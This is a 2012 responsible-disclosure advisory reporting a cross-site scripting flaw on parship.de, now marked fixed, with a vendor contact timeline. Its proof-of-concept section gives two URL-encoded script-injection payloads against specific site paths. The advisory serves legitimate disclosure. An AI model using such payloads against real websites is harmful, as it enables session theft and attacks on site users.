Advisory: www.parship.de - Cross-site Scripting vulnerability Advisory ID: SSCHADV2012-026 Author: Stefan Schurtz Affected Software: Successfully tested on www.parship.de Vendor URL: http://www.parship.de Vendor Status: fixed ========================== Vulnerability Description ========================== http://www.parship.de is prone to a XSS vulnerability ========================== PoC-Exploit ========================== POST: http://www.parship.de/potw/answer%22%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(/huh/)%3C/script%3E POST: http://www.parship.de/login/sendpassword/requestpassword%22%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(/huh/)%3C/script%3E ========================== Solution ========================== fixed ========================== Disclosure Timeline ========================== 23-Dec-2012 - informed by contact form 24-Dec-2012 - feedback from vendor 05-Feb-2013 - feedback and fix from vendor ========================== Credits ========================== Vulnerability found and advisory written by Stefan Schurtz. ========================== References ========================== http://www.darksecurity.de/advisories/2012/SSCHADV2012-026.txt